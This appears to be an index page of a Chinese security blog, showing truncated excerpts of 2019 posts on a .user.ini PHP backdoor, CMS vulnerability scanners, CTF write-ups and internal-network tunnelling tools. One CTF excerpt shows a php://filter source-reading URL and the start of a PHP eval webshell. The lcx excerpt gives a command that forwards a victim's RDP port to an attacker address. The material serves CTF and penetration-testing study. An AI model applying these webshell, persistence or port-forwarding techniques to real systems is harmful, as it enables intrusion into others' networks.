.user.ini文件构成的PHP后门

.user.ini文件构成的PHP后门

本篇文章是转载:原文地址:http://www.vuln.cn/6001.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性。0x01 .user.ini那么什么是.user.ini?这得从php.ini说起了。php.ini是php默认的配置文件,其中包括了很多php的配置,这些配置中,又分为几种:PHP...

Web安全,权限维持 2019-10-31 PM 43℃ 0条
FrameScan CMS漏洞扫描

FrameScan CMS漏洞扫描

FrameScan工具简介GithubL:https://github.com/qianxiao996/FrameScanFrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。支持平台WindowsLinuxMAC(请自测)工具特点单URL批量检测单URL单漏洞检测单URL指定CMS检测多URL单漏洞检测单URL单漏洞检测单URL指定CMS检测详细参数如下:    -u   ...

安全工具 2019-10-29 PM 128℃ 2条
CTF--Do you like xml

CTF--Do you like xml

题目链接:http://47.94.221.39:8008/扫描目录得到/.DS_Store文件下载文件,直接用脚本进行还原操作。 https://github.com/lijiejie/ds_store_exp打开backend文件直接搜索得到flag

CTF 2019-10-29 PM 30℃ 0条
CTF--这好像不是文件上传

CTF--这好像不是文件上传

打开题目F12看到一个被注释的跳转。访问可以知道是一个文件包含经过测试,该文件禁止了input、data关键字。并禁止了phar://协议。使用php://filter读取题目源码得到http://47.94.221.39:8003/index.php?filename=php://filter/read=convert.base64-encode/resource=index.php读取upload.php文件源码如下:可以看出upload文件将上传的文件后缀改为txt,文件为重命名了。所以想到利用phar://协议,将一个1.php写入一句话木马,<?php eval($_PO...

CTF 2019-10-29 PM 58℃ 0条
FrameScan-GUI  CMS漏洞扫描

FrameScan-GUI CMS漏洞扫描

工具简介FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。Github地址:https://github.com/qianxiao996/FrameScan-GUI下载地址:https://github.com/qianxiao996/FrameScan-GUI/releases支持平台- Windows使用方法下载本项目,运行exe即可。自定义POC模板以下为POC模板,请尽量规范...

安全工具 2019-10-06 AM 103℃ 2条
内网穿透工具--NPS

内网穿透工具--NPS

一、简介    NPS是一款轻量级,高性能,强大功能的内网穿透代理服务器。目前支持TCP,UDP流量转发,可支持任何TCP,UDP上层协议(访问内网网站,本地支付接口调试,SSH访问,远程桌面,内网dns解析等等......),此外还支持内网http代理,内网socks5代理,p2p等,并带有功能强大的网络管理端。源码地址:https://github.com/cnlh/nps发布地址:https://github.com/cnlh/nps/releases通常内网穿透工具都有服务端和客户端,安装要求如下: 服务端:需要安装在一个有公网IP的服务器上,系统为Linux/Window...

安全工具,内网渗透 2019-09-17 PM 68℃ 0条
端口转发工具--lcx

端口转发工具--lcx

简介    lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。使用1.将本地接口转发到远程主机的端口。攻击者ip:192.168.1.2受害者ip:192.168.1.3将lcx.exe上传到受害者主机上,执行:lcx.exe -slave 192.168.1.2 8080 192.168.1.3 3389...

安全工具,内网渗透 2019-09-17 PM 45℃ 0条
内网代理工具--EarthWorm

内网代理工具--EarthWorm

一、简介        EarthWorm是内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。为实现这些功能,EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave。从三项功能的角度可以这样划分 功能名称 对应模块 正向代理 ssocksd 反向代理 rcsocks,rssocks 端口转发 lcx_listen,lcx_slave,lcx_tran 二、正向代理一条命令即可./ew -s ssocksd --...

安全工具,内网渗透 2019-09-16 PM 39℃ 0条
内网代理工具--reGeorg

内网代理工具--reGeorg

一、简介        reGeorg是reDuh的继承者,利用了会话层的socks5协议,效率更高结合Proxifier使用        Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。该文件下支持php,asp,jsp,aspx。        ProxyChains是kali中的一个代理工具下载地址:        reGeorg  https://github.com/sensepost/reGeorg        Proxifier http://8dx.pc6.com/xjq6/P...

安全工具,内网渗透 2019-09-16 PM 42℃ 0条